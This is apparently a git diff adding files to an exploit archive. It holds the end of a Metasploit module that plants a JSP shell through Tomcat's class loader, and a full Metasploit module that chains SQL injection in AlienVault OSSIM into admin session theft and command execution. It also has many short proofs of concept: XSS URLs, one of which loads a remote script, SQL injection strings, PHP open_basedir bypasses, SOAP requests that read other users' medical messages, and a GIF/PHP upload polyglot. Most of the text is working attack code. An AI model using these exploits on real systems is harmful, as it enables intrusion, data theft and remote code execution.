<% Runtime.getRuntime().exec(\"./#{file}\"); %>
eos
dropper
end
def dump_line(uri, cmd = "")
res = send_request_cgi({
'uri' => uri+cmd,
'version' => '1.1',
'method' => 'GET',
})
res
end
def modify_class_loader(opts)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s),
'version' => '1.1',
'method' => 'GET',
'vars_get' => {
"class['classLoader'].resources.context.parent.pipeline.first.directory" => opts[:directory],
"class['classLoader'].resources.context.parent.pipeline.first.prefix" => opts[:prefix],
"class['classLoader'].resources.context.parent.pipeline.first.suffix" => opts[:suffix],
"class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
}
})
res
end
def check_log_file(hint)
uri = normalize_uri("/", @jsp_file)
print_status("#{peer} - Waiting for the server to flush the logfile")
10.times do |x|
select(nil, nil, nil, 2)
# Now make a request to trigger payload
vprint_status("#{peer} - Countdown #{10-x}...")
res = dump_line(uri)
# Failure. The request timed out or the server went away.
fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") if res.nil?
# Success if the server has flushed all the sent commands to the jsp file
if res.code == 200 && res.body && res.body.to_s =~ /#{hint}/
print_good("#{peer} - Log file flushed at http://#{peer}/#{@jsp_file}")
return true
end
end
false
end
# Fix the JSP payload to make it valid once is dropped
# to the log file
def fix(jsp)
output = ""
jsp.each_line do |l|
if l =~ /<%.*%>/
output << l
elsif l =~ /<%/
next
elsif l.chomp.empty?
next
else
output << "<% #{l.chomp} %>"
end
end
output
end
def create_jsp
if target['Arch'] == ARCH_JAVA
jsp = fix(payload.encoded)
else
payload_exe = generate_payload_exe
payload_file = rand_text_alphanumeric(4 + rand(4))
jsp = jsp_dropper(payload_file, payload_exe)
register_files_for_cleanup(payload_file)
end
jsp
end
def exploit
prefix_jsp = rand_text_alphanumeric(3+rand(3))
date_format = rand_text_numeric(1+rand(4))
@jsp_file = prefix_jsp + date_format + ".jsp"
# Modify the Class Loader
print_status("#{peer} - Modifying Class Loader...")
properties = {
:directory => 'webapps/ROOT',
:prefix => prefix_jsp,
:suffix => '.jsp',
:file_date_format => date_format
}
res = modify_class_loader(properties)
unless res
fail_with(Failure::TimeoutExpired, "#{peer} - No answer")
end
# Check if the log file exists and hass been flushed
if check_log_file(normalize_uri(target_uri.to_s))
register_files_for_cleanup(@jsp_file)
else
fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed")
end
# Prepare the JSP
print_status("#{peer} - Generating JSP...")
jsp = create_jsp
# Dump the JSP to the log file
print_status("#{peer} - Dumping JSP into the logfile...")
random_request = rand_text_alphanumeric(3 + rand(3))
jsp.each_line do |l|
unless dump_line(random_request, l.chomp)
fail_with(Failure::Unknown, "#{peer} - Missed answer while dumping JSP to logfile...")
end
end
# Check log file... enjoy shell!
check_log_file(random_request)
# No matter what happened, try to 'restore' the Class Loader
properties = {
:directory => '',
:prefix => '',
:suffix => '',
:file_date_format => ''
}
modify_class_loader(properties)
end
end

87
platforms/multiple/webapps/33019.txt Executable file
View file

@ -0,0 +1,87 @@
Affected Product
==================================
miSecureMessages from Amtelco - Tested on version: Client=4.0.1
Server=6.2.4552.30017
iOS: https://itunes.apple.com/us/app/misecuremessages/id423957478?mt=8
android: https://play.google.com/store/apps/details?id=com.amtelco.secure
website: https://misecuremessages.com/
Product Description
==================================
miSecureMessages is a secure, two-way instant smartphone and tablet
messaging Android™ App that uses encryption to keep your messages private.
Messages can be sent securely from device to device, and by using the
secure cloud-based or on-site directory solution. When you receive a
message from miSecureMessages, a Persistent Alert notifies you until you
acknowledge the message. You can view the message, and quickly send a
secure reply. miSecureMessages is perfect for healthcare and medical
professionals to protect patient PHI, as well as industries that need
secure instant messaging.
Vulnerability Details
==================================
----------------------------------
Session Management Vulnerability
----------------------------------
miSecureMessages lacks any sort of session management. Among other things,
this allows any user to modify the xml requests to retrieve other users
messages.
PoC(1):
POST /msmwebservice/service.asmx HTTP/1.1
Host: misecureserver.localhost.com
Proxy-Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=utf-8
Accept-Language: en-us
SOAPAction: http://amtelco.com/ssm/GetMessages
Connection: keep-alive
User-Agent: miSecureMessages/4.0.1 CFNetwork/672.0.8 Darwin/14.0.0
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="
http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetMessages xmlns="http://amtelco.com/ssm/">
<folders>1</folders><contactID>1</contactID><unreadOnly>false</unreadOnly><license>XXXX.X.XXXX</license></GetMessages>
</soap:Body>
</soap:Envelope>
Due to the lack of session management, it is possible to change the
<contactID> value to any valid contact ID and retrieve all messages for the
user associated with that contact ID.
----------------------------------
Authentication bypass vulnerability
----------------------------------
Authentication is not required to access messages, only the input of a
valid "license key". By modifying and sequentially enumerating through the
<contactID> it is possible to retrieve all messages without authenticating.
PoC(2):
POST /msmwebservice/service.asmx HTTP/1.1
Host: misecureserver.localhost.com
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 473
<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="
http://www.w3.org/2003/05/soap-envelope">
<soap12:Body>
<GetMessages xmlns="http://amtelco.com/ssm/">
<license>XXXX.X.XXXX</license>
<contactID>1</contactID>
<unreadOnly>false</unreadOnly>
<folders>1</folders>
</GetMessages>
</soap12:Body>
</soap12:Envelope>

21
platforms/php/local/33161.php Executable file
View file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/36007/info
PHP is prone to an 'open_basedir' restriction-bypass vulnerability because of a design error.
Successful exploits could allow an attacker to write files in unauthorized locations.
This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' and 'open_basedir' restrictions are expected to isolate users from each other.
PHP 5.3.0 is vulnerable.
<?php
$to = 'stop@example.com';
$subject = 'open_basedir bypass by http://securityreason.com';
$message = 'exploit';
$headers = 'From: stop@example.com' . "\r\n" .
'Reply-To: stop@example.com' . "\r\n" .
'X-Mailer: PHP<?php echo ini_get(\'open_basedir\');?>/' .
phpversion();
mail($to, $subject, $message, $headers);
?>

356
platforms/php/remote/33141.rb Executable file
View file

@ -0,0 +1,356 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "AlienVault OSSIM SQL Injection and Remote Code Execution",
'Description' => %q{
This module exploits an unauthenticated SQL injection vulnerability affecting AlienVault
OSSIM versions 4.3.1 and lower. The SQL injection issue can be abused in order to retrieve an
active admin session ID. If an administrator level user is identified, remote code execution
can be gained by creating a high priority policy with an action containing our payload.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Sasha Zivojinovic', # SQLi discovery
'xistence <xistence[at]0x90.nl>' # Metasploit module
],
'References' =>
[
['OSVDB', '106252'],
['EDB', '33006']
],
'DefaultOptions' =>
{
'SSL' => true,
'WfsDelay' => 10
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'RequiredCmd' => 'generic perl python',
}
},
'Targets' =>
[
['Alienvault OSSIM 4.3', {}]
],
'Privileged' => true,
'DisclosureDate' => "Apr 24 2014",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/'])
], self.class)
end
def check
marker = rand_text_alpha(6)
sqli_rand = rand_text_numeric(4+rand(4))
sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) "
sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),
'vars_get' => { 'date_from' => sqli }
})
if res && res.code == 200 && res.body =~ /#{marker}726F6F7440[0-9a-zA-Z]+#{marker}/ # 726F6F7440 = root
return Exploit::CheckCode::Vulnerable
else
print_status("#{res.body}")
return Exploit::CheckCode::Safe
end
end
def exploit
marker = rand_text_alpha(6)
sqli_rand = rand_text_numeric(4+rand(4))
sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) "
sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}"
print_status("#{peer} - Trying to grab admin session through SQLi")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'),
'vars_get' => { 'date_from' => sqli }
})
if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/
admin_session = $1
@cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*")
print_status("#{peer} - Admin session cookie is [ #{@cookie} ]")
else
fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session")
end
# Creating an Action containing our payload, which will be executed by any event (not only alarms)
action = rand_text_alpha(8+(rand(8)))
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "modifyactions.php"),
'cookie' => @cookie,
'vars_post' => {
'action' => 'new',
'action_name' => action,
'descr' => action,
'action_type' => '2',
'only' => 'on',
'cond' => 'True',
'exec_command' => payload.encoded
}
})
if res && res.code == 200
print_status("#{peer} - Created Action [ #{action} ]")
else
fail_with(Failure::Unknown, "#{peer} - Action creation failed!")
end
# Retrieving the Action ID, used to clean up the action after successful exploitation
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"),
'cookie' => @cookie,
'vars_post' => {
'page' => '1',
'rp' => '2000'
}
})
if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/
@action_id = $1
print_status("#{peer} - Action ID is [ #{@action_id} ]")
else
fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!")
end
# Retrieving the policy data, necessary for proper cleanup after succesful exploitation
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"),
'cookie' => @cookie,
'vars_get' => {
'm_opt' => 'configuration',
'sm_opt' => 'threat_intelligence',
'h_opt' => 'policy'
}
})
if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/
policy_ctx = $1
policy_group = $2
print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!")
else
fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!")
end
# Creating policy which will be triggered by any source/destination
policy = rand_text_alpha(8+(rand(8)))
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "newpolicy.php"),
'cookie' => @cookie,
'vars_post' => {
'descr' => policy,
'active' => '1',
'group' => policy_group,
'ctx' => policy_ctx,
'order' => '1', # Makes this the first policy, overruling all the other policies
'action' => 'new',
'sources[]' => '00000000000000000000000000000000', # Source is ANY
'dests[]' => '00000000000000000000000000000000', # Destination is ANY
'portsrc[]' => '0', # Any source port
'portdst[]' => '0', # Any destination port
'plug_type' => '1', # Taxonomy
'plugins[0]' => 'on',
'taxfilters[]' =>'20@13@118', # Product Type: Operating System, Category: Application, Subcategory: Web - Not Found
'tax_pt' => '0',
'tax_cat' => '0',
'tax_subc' => '0',
'mboxs[]' => '00000000000000000000000000000000',
'rep_act' => '0',
'rep_sev' => '1',
'rep_rel' => '1',
'rep_dir' => '0',
'ev_sev' => '1',
'ev_rel' => '1',
'tzone' => 'Europe/Amsterdam',
'date_type' => '1',
'begin_hour' => '0',
'begin_minute' => '0',
'begin_day_week' => '1',
'begin_day_month' => '1',
'begin_month' => '1',
'end_hour' => '23',
'end_minute' => '59',
'end_day_week' => '7',
'end_day_month' => '31',
'end_month' => '12',
'actions[]' => @action_id,
'sim' => '1',
'priority' => '1',
'qualify' => '1',
'correlate' => '0', # Don't make any correlations
'cross_correlate' => '0', # Don't make any correlations
'store' => '0' # We don't want to store anything :)
}
})
if res && res.code == 200
print_status("#{peer} - Created Policy [ #{policy} ]")
else
fail_with(Failure::Unknown, "#{peer} - Policy creation failed!")
end
# Retrieve policy ID, needed for proper cleanup after succesful exploitation
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"),
'cookie' => @cookie,
'vars_get' => {
'ctx' => policy_ctx,
'group' => policy_group
},
'vars_post' => {
'page' => '1',
'rp' => '2000'
}
})
if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/
@policy_id = $1
print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!")
else
fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!")
end
# Reload the policies to make our new policy active
print_status("#{peer} - Reloading Policies")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),
'cookie' => @cookie,
'vars_get' => {
'what' => 'policies',
'back' => '../policy/policy.php'
}
})
if res && res.code == 200
print_status("#{peer} - Policies reloaded!")
else
fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")
end
# Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm.
dont_exist = rand_text_alpha(8+rand(4))
print_status("#{peer} - Triggering policy and action by requesting a non existing url")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, dont_exist),
'cookie' => @cookie
})
if res and res.code == 404
print_status("#{peer} - Payload delivered")
else
fail_with(Failure::Unknown, "#{peer} - Payload failed!")
end
end
def cleanup
begin
# Clean up, retrieve token so that the policy can be removed
print_status("#{peer} - Cleaning up")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"),
'cookie' => @cookie,
'vars_post' => { 'f_name' => 'delete_policy' }
})
if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/
token = $1
print_status("#{peer} - Token [ #{token} ] retrieved")
else
print_warning("#{peer} - Unable to retrieve token")
end
# Remove our policy
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"),
'cookie' => @cookie,
'vars_get' => {
'confirm' => 'yes',
'id' => @policy_id,
'token' => token
}
})
if res && res.code == 200
print_status("#{peer} - Policy ID [ #{@policy_id} ] removed")
else
print_warning("#{peer} - Unable to remove Policy ID")
end
# Remove our action
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"),
'cookie' => @cookie,
'vars_get' => {
'id' => @action_id,
}
})
if res && res.code == 200
print_status("#{peer} - Action ID [ #{@action_id} ] removed")
else
print_warning("#{peer} - Unable to remove Action ID")
end
# Reload the policies to revert back to the state before exploitation
print_status("#{peer} - Reloading Policies")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),
'cookie' => @cookie,
'vars_get' => {
'what' => 'policies',
'back' => '../policy/policy.php'
}
})
if res && res.code == 200
print_status("#{peer} - Policies reloaded!")
else
fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")
end
ensure
super # mixins should be able to cleanup even in case of Exception
end
end
end

12
platforms/php/remote/33162.php Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/36009/info
PHP is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
<?php
ini_set("session.save_path", "0123456789ABCDEF");
ini_restore("session.save_path");
session_start();
?>

15
platforms/php/remote/33163.php Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/36009/info
PHP is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
<?php
ini_set("open_basedir", "A");
ini_restore("open_basedir");
ini_get("open_basedir");
include("B");
?>

9
platforms/php/webapps/33144.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35920/info
Censura is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Censura 2.1.1 are vulnerable.
http://www.example.com/review/productSearch.html?search=1&amp;action=ProductSearch&amp;q=%3CSCRIPT%2FSRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&amp;vendorId=&amp;categoryId=&amp;submit=Search

11
platforms/php/webapps/33146.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/35936/info
CS-Cart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to CS-Cart 2.0.6 are vulnerable.
The following example URI is available:
http://www.example.com/index.php?dispatch=reward_points.userlog&result_ids=pagination_contents&sort_by=timestamp&sort_order='

10
platforms/php/webapps/33147.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/35968/info
AJ Auction Pro is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
AJ Auction Pro 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?do=search&type=&stime=&txtkeyword=%27%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXss%3C%2FH1%3E%3C%2FMARQUEE%3E&id=all&button=Search&select2=all&select3=endsoon

9
platforms/php/webapps/33149.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35979/info
OpenCms is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an authenticated attacker to obtain sensitive information, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OpenCms 7.5.0 is affected; other versions may also be vulnerable.
http://www.example.com/opencms/opencms/system/modules/org.opencms.workplace.help/jsptemplates/help_head.jsp?&homelink=>"&#039;><script>alert("This%20site%20has%20been%20compromised")</script>

11
platforms/php/webapps/33152.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/35996/info
PhotoPost PHP is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PhotoPost PHP 3.3.1 is vulnerable; other versions may also be affected.
http://www.example.com/showgallery.php?cat=[nr] and substring(@@version,1,1)=4 <= True
http://www.example.com/showgallery.php?cat=[nr] and substring(@@version,1,1)=5 <= False
http://www.example.com/showgallery.php?cat=&#039;"><script>alert(&#039;xss&#039;)</script>

9
platforms/php/webapps/33153.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/36001/info
SupportPRO SupportDesk is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
SupportDesk 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/demo/shownews.php/"><script>alert(document.cookie);</script>

9
platforms/php/webapps/33154.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/36002/info
SQLiteManager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
SQLiteManager 1.2.0 is vulnerable; other versions may also be affected.
http://www.example.com/main.php?redirect=<script>alert(&#039;Hadi Kiamarsi&#039;)</script>

7
platforms/php/webapps/33155.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/36003/info
ViArt CMS is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
http://www.example.com/cms-demo/forums.php?category_id=1>"><ScRiPt %0D%0A>alert(522558583855)%3B</ScRiPt>

53
platforms/php/webapps/33156.txt Executable file
View file

@ -0,0 +1,53 @@
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# ____ _ _ ____
# | _ \ __ _(_)___ _ _| | _____ | _ \ __ _ _ __
# | | | |/ _` | / __| | | | |/ / _ \ | | | |/ _` | '_ \
# | |_| | (_| | \__ \ |_| | < __/ | |_| | (_| | | | |
# |____/ \__,_|_|___/\__,_|_|\_\___| |____/ \__,_|_| |_|
#
# #CyberNinja | My katana can slay any security!
# >> Twitter @TheHackersBay
# >> Pentester / Underground hacker
#
# Exploit Title: Crime24 Stealer Panel <= Multiple Vulnerabilities
# Date: Sunday May 3 2014
# Exploit Author: Daisuke Dan
# Vendor Homepage: Crime24.net
# Version: v.1
# Tested on: Windows Seven
# Blog post: http://thehackersbay.org/blog/2014/05/03/crime24-stealer-panel/
#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
An attacker can execute an XSS and inject sql commands in the search form.
You must be logged in the admin panel.
#=========================== EXPLOITATION ==============================
0x01 Detecting the error
POST: http://site.com/?action=search
POST Content: q='"><img+src=x+onerror=prompt('DaisukeDan');>&in=1&search=Search
Example: http://i.imgur.com/zyIr5xv.png
Result: Cross site scripting + SQL error
0x02 Exploit the SQL Injection
[+] Vulnerable code:
$result = mysql_query("SELECT * FROM `logs` WHERE `".$cols[$_POST["in"]]."` LIKE '%".$_POST["q"]."%';", $mysql);
POST: http://site.com/?action=search
POST Content:
q=' union select 1,2,group_concat(column_name,0x0a),4,5,6,7,8 from information_schema.columns where table_name=0x6c6f6773-- -
&in=1&search=Search
Example: http://i.imgur.com/t4ydLsR.png
You have access to all the database.
#=========================== Gr33tz =============================#
| Raw-x | eth0 | Downfall | XzLt | Insider | rootaccess | Yasker |
| EZiX | Negative | ajkaro | Un0wn_X | H4T | NeTwork | Pent0thal |
#================================================================#

7
platforms/php/webapps/33157.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/36003/info
ViArt CMS is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
http://www.example.com/cms-demo/forum.php?forum_id=1>"><ScRiPt %0D%0A>alert(522558583855)%3B</ScRiPt>

7
platforms/php/webapps/33158.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/36003/info
ViArt CMS is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
http://www.example.com/cms-demo/forum_topic_new.php?forum_id=1>"><ScRiPt %0D%0A>alert(522558583855)%3B</ScRiPt>

10
platforms/php/webapps/33160.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/36006/info
Papoo is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately validate user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
The following command will generate a file with a valid GIF header that runs the 'phpinfo()' function when requested:
$ printf "GIF89a\x01\x00\x01\x00<?php phpinfo();?>" > poc.php